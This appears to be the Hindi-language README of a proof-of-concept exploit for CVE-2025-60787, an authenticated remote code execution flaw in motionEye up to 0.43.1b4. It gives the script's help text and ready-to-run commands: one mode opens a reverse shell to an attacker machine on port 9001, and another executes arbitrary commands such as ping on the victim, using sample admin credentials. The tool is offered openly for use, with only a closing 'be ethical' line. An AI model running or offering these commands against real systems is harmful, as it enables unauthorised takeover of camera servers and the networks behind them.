
CVE-2025-60787 के लिए PoC - motionEye में 0.43.1b4 (सहित) तक के सभी संस्करणों के लिए प्रमाणित RCE
CVE-2025-60787 के लिए PoC, जो motionEye के लिए एक Authenticated RCE भेद्यता है, जिसमें सभी प्रभावित संस्करण 0.43.1b4 तक (सम्मिलित) शामिल हैं।
यह इस रिपॉजिटरी में वर्णित भेद्यता के लिए एक स्वचालित PoC है। श्रेय prabhatverma47 को।
स्क्रिप्ट में 2 कमांड हैं जो इस भेद्यता का दुरुपयोग करते हैं। एक जो सीधे revshell नामक रिवर्स शेल भेजता है और दूसरा कमांड command नामक, जो इस CVE का दुरुपयोग करके सीधे कमांड निष्पादित करता है।
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
शेल प्राप्त करने के लिए revshell कमांड का उपयोग करें। उदाहरण के लिए:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
जहाँ 10.10.10.10 लक्ष्य मशीन है (motionEye चलाने वाली मशीन), 10.10.10.15 हमारी हमलावर मशीन है और 9001 वह पोर्ट है जिस पर हम रिवर्स शेल पकड़ने के लिए सुन रहे हैं।
यदि रिवर्स शेल के बजाय हम अन्य कमांड दूरस्थ रूप से निष्पादित करना चाहते हैं, तो हम command विकल्प का उपयोग कर सकते हैं। उदाहरण के लिए, पीड़ित मशीन पर ping -c1 10.10.10.15 कमांड निष्पादित करें:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
जहाँ 10.10.10.10 motionEye चलाने वाली मशीन है।
इस स्क्रिप्ट का उपयोग हमेशा अपनी स्वयं की जिम्मेदारी पर करें।
नैतिक रहें (: